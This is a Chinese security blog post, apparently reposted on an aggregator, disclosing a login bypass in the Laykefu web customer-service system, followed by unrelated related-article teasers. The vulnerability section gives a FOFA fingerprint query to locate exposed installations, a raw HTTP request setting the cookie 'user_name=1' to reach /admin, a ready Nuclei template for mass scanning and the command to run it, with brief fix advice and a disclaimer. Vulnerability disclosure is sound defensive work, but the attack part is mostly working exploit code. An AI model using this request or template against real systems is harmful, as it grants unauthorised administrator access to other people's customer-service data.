Laykefu客服系统后台登录绕过

Laykefu客服系统后台登录绕过

article2024/5/13 18:10:28/文章来源:https://blog.csdn.net/2301_80127209/article/details/136071576

【产品介绍】

Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统，旨在帮助企业有效管理和提供优质的客户服务

【漏洞介绍】

请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台，恶意攻击者可利用此漏洞获得后台权限

【资产测绘Query】

fofa语法：icon_hash="-334624619"

【产品界面】

【漏洞复现】

【poc】

GET /admin HTTP/2
Host:
Cookie: user_name=1
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Te: trailers
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept-Encoding: gzip, deflate

【Nuclei-Poc】

id: Laykefu-Unauthorized

info:
name: Laykefu Unauthorized
author: admin
severity: high
description: description
reference:
- https://
tags: tags

http:
- raw:
- |+
GET /admin HTTP/2
Host: {{Hostname}}
Cookie: user_name=1
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Te: trailers
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept-Encoding: gzip, deflate


matchers-condition: and
matchers:
- type: binary
part: body
binary:
- e5aea2e69c8d
- type: status
status:
- 200

【验证】

.\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂商进行修复。
2、如非必要，禁止公网访问该系统。
3、设置白名单访问。

申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

免费领取安全学习资料包！

渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

应急响应笔记

学习路线

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mfbz.cn/a/377210.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

基于摄像头的虹膜识别技术

基于摄像头的虹膜识别技术

随着苹果公司的指纹识别TouchID的推广流行，三星等公司的积极跟进，生物识别技术正被移动设备厂商所重视。虹膜是什么？ 人的眼睛由巩膜、虹膜、瞳孔三部分构成。巩膜即眼球外围的白色部分，约占总面积的30%；眼睛中心为瞳…

阅读更多...

【React】如何使antd禁用状态的表单输入组件响应点击事件？

【React】如何使antd禁用状态的表单输入组件响应点击事件？

最近遇到一个需求，需要在<Input.textarea>组件中，设置属性disabled为true，使textarea响应点击事件，但直接绑定onClick并不会在禁用状态下被响应。解决方法1 之后尝试了很多方法，比如设置csspointer-events:no…

阅读更多...

日本失去的三十年：去杠杆用了14年

日本失去的三十年：去杠杆用了14年

去年以来，日股在日本央行转鹰预期、基本面改善和一系列监管新规的催化下高歌猛进，日经指数已经逼近90年代资产泡沫时期的高位。今年迄今累计上涨8.51%，领跑全球，“失落的三十年”似乎已经远去。日本因何走向衰退？“失…

阅读更多...

MPLS VPN功能组件(2)

MPLS VPN功能组件(2)

MP-BGP 采用地址族（Address Family）来区分不同的网络层协议，以便正确处理VPN-IPv4路由传统的BGP-4（RFC1771）只能管理IPv4的路由信息，无法正确处理地址空间重叠的VPN的路由。为了正确处理VPN路由，VPN使用RFC2858（Multiprotocol Extensions for BGP-4）中规定的MP-BG…

阅读更多...

云计算 - 弹性计算技术全解与实践

云计算 - 弹性计算技术全解与实践

一、引言在过去的十年里，云计算从一个前沿概念发展为企业和开发者的必备工具。传统的计算模型通常局限于单一的、物理的位置和有限的资源，而云计算则通过分布式的资源和服务，为计算能力带来了前所未有的"弹性"。弹性：…

阅读更多...

TryHackMe-Vulnerability Capstone练习

TryHackMe-Vulnerability Capstone练习

本文相关的TryHackMe实验房间链接：TryHackMe | Vulnerability Capstone 先nmap扫一下接下来我们访问一下接下来我们searchsploit找一下漏洞 searchsploit Fuel CMS 执行漏洞exp（此处使用TryHackMe中的box） 如果使用本地机需要下载exp&am…

阅读更多...

算法练习-删除二叉搜索树中的节点（思路+流程图+代码）

算法练习-删除二叉搜索树中的节点（思路+流程图+代码）

难度参考难度：中等分类：二叉树难度与分类由我所参与的培训课程提供，但需要注意的是，难度与分类仅供参考。且所在课程未提供测试平台，故实现代码主要为自行测试的那种，以下内容均为个人笔记，旨…

阅读更多...

制作离线版element ui文档

制作离线版element ui文档

链接：https://pan.baidu.com/s/1k5bsCK9WUlZobhFBLItw1g?pwdgeyk 提取码：geyk --来自百度网盘超级会员V4的分享 https://github.com/ElemeFE/element 克隆官方代码使用nvm切换node版本，推荐使用14.0.0 http://doc.xutongbao.top/doc/#/zh…

阅读更多...

Prompt Engineering实战-构建“哄哄模拟器”

Prompt Engineering实战-构建“哄哄模拟器”

目录一背景二 “哄哄模拟器”的Prompt Prompt 的典型构成三操作步骤 3.1 创建对话 3.2 游戏测试一背景前几天《AI 大模型全栈工程师》第二节课讲了“Prompt Engineering，提示工程”，里面提到一些prompt相关的技巧，原则&#xf…

阅读更多...

浅谈分布式CAP定律、BASE理论

浅谈分布式CAP定律、BASE理论

第一节分布式架构设计理论与Zookeeper环境搭建 1. 分布式架构设计理论学习Zookeeper之前,我们需要掌握一些分布式系统基础知识：了解分布式系统的概念、原理。配置管理域名服务分布式同步发布订阅 1. 分布式架构介绍 1.1 什么是分布式《分布式系统原理和…

阅读更多...

构建异步高并发服务器：Netty与Spring Boot的完美结合

构建异步高并发服务器：Netty与Spring Boot的完美结合

前言「作者主页」：雪碧有白泡泡「个人网站」：雪碧的个人网站 ChatGPT体验地址文章目录前言IONetty1. 引入依赖2. 服务端4. 客户端结果总结引导类-Bootstarp和ServerBootstrap连接-NioSocketChannel事件组-EventLoopGroup和NioEventLoopGroup 送书…

阅读更多...

COMSOL接触（高度非线性）仿真常见报错及解决方法总结

COMSOL接触（高度非线性）仿真常见报错及解决方法总结

前言由于COMSOL采用隐式求解器，相较于使用显式求解器的Dyna、Abaqus等软件。要在COMSOL中实现结构接触这一高度非线性问题难度较大，报错时有发生。究其原因，是当物体之间相互接触时，物体受到的应力、运动路径会发生突变&#xff…

阅读更多...

LabVIEW高精度微小电容测量

LabVIEW高精度微小电容测量

LabVIEW高精度微小电容测量在电子工程和科研领域，精确测量微小电容值是一项有一定要求的任务，尤其在涉及到高精度和低成本时。设计了一种基于LabVIEW高精度微小电容测量系统，旨在提供一个既经济又高效的解决方案。该系统的核心在于使用FD…

阅读更多...

C语言中的内存函数你知道多少呢？

C语言中的内存函数你知道多少呢？

目录编辑 1. memcpy的使用和模拟实现 1.1函数介绍编辑 1.2函数的使用 1.3模拟实现 2. memmove的使用和模拟实现 2.1函数介绍 2.2函数的使用 2.3模拟实现 3. memset函数的使用 3.1函数介绍 3.2函数的使用编辑 4. memcmp函数的使用 4.1函数介绍 4.2函数…

阅读更多...

Python循环语句——range语句

Python循环语句——range语句

一、引言在Python编程中，range函数是一个内置函数，用于生成一个不可变的数字序列。它常被用于循环结构，如for循环，来遍历一系列的数字。尽管其使用非常基础，但range的强大之处在于其提供了灵活性，可以创建…

阅读更多...

$【2024.2.5练习】砍竹子（25分）$

【2024.2.5练习】砍竹子（25分）

题目描述题目分析考虑题目是否满足贪心。每次施展魔法会使一段连续的竹子高度变为一半左右的平方根。根据样例，似乎每次让最高的竹子变短就能得到最优解。假设魔法一次只能对一根竹子使用，永远不出现连续相同高度的竹子，那么显然无论使用…

阅读更多...

接口幂等性

接口幂等性

接口幂等性如何实现幂等性实现方式一：数据库唯一主键实现方式二：Token机制实现方式三：数据库乐观锁实现方式四、加分布式锁如何实现幂等性其实实现幂等性的方案有不少，但是呢，这就得需要你根据不同的业务场景去选择…

阅读更多...

Stable Diffusion 模型下载：Disney Pixar Cartoon Type A（迪士尼皮克斯动画片A类）

Stable Diffusion 模型下载：Disney Pixar Cartoon Type A（迪士尼皮克斯动画片A类）

文章目录模型介绍生成案例案例一案例二案例三案例四案例五案例六案例七案例八案例九案例十下载地址模型介绍目前还没有一个好的皮克斯迪士尼风格的卡通模型，所以我决定自己制作一个。这是将皮克斯风格模型与我自己的Loras合并在一起，创建一个通用的…

阅读更多...

oracle 启动命令以及ORA-01033问题处理、删除归档日志

oracle 启动命令以及ORA-01033问题处理、删除归档日志

1 启动数据库:startup 2 关闭数据库：Shutdown immediate 3 查看监听状态：lsnrctl status 4 启动监听：lsnrctl start 5 停止监听：lsnrctl stop 常见问题 1、在服务器重启后会出现，Oracle ORA-01033: ORAC…

阅读更多...

渗透测试-信息打点与架构分析细节梳理

渗透测试-信息打点与架构分析细节梳理

渗透测试-信息打点与架构分析细节梳理为了保障信息安全，我在正文中会去除除靶场环境的其他任何可能的敏感信息什么是网站架构网站架构包括网站的方方面面，下面是常见的内容： 前端（Front-End）： 使用Reac…

阅读更多...

最新文章